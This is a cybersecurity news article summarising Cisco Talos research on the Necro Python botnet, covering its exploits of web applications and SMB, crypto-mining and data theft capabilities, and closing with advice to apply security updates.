In the latest malware developments, the Necro Python malware has been found to be developing new and malicious capabilities, thereby intensifying its cyber threat.

Malicious Necro Python Malware:

Security researchers from Cisco Talos have newly published a report regarding their latest findings on the Necro Python Malware.

The malicious botnet has been developing since at least 2015 and its mal-progress has been observed and documented by other security researchers such as Check Point Research and Netlab 360, which are tracked as FreakOut and Necro respectively by them.

Reportedly, the developers of the Necro Python malware have been in the works to increase the capabilities and versatility of the malware. 

This involves exploits of over 10 different web applications and the SMB protocol that are being utilized by the malware.

These exploits have been used to compromise vulnerabilities in software such as VMWare vSphere, Vesta Control Panel, and the SCO OpenServer.

A variant of the botnet that was deployed on May 18 also included exploits for EternalBlue (CVE-2017-0144) and EterbnalRomance (CVE-2017-0147).

Upgraded abilities and mal-operations of Necro Python:

To detail the deploying phases of the Necro Python malware, it will primarily try to exploit these vulnerabilities within both the Linux OS and the Windows OS.

If the botnet is successful in exploiting these systems, it then uses a JavaScript Downloader, Python interpreter and scripts, and executables created with pyinstaller.

Also read,

This compromised system is subsequently used as a slave machine for the botnet. 

Thereafter, Necro Python establishes a connection with its command and control server to maintain contact with the operator, obtain commands, steal and exfiltrate data, or deploy supplementary malware payloads.

Reportedly, the newest extension of the malware is a crypto miner, XMRig, used to generate Moneri (XMR) by creeping the slave machine’s computing resources.

“The bot also injects the code to download and execute a JavaScript-based miner from an attacker-controlled server into HTML and PHP files on infected systems,” the researchers provided. “If the user opens the infected application, a JavaScript-based Monero miner will run within their browser’s process space.”

Some of the other malicious capabilities of the Necro python malware include launching DoS attacks (Denial of Service), data exfiltration, and network sniffing.

A noteworthy upgraded ability of the botnet that has been observed by the researchers is that one of its modules permits developers to view code as it would be viewed by an interpreter before being compiled to bytecode.

This module had also been integrated into an engine that may allow runtime amendments,

“Necro Python bot shows an actor that follows the latest development in remote command execution exploits on various web applications and includes the new exploits into the bot,” says Cisco Talos. “This increases its chances of spreading and infecting systems. Users need to make sure to regularly apply the latest security updates to all of the applications, not just operating systems.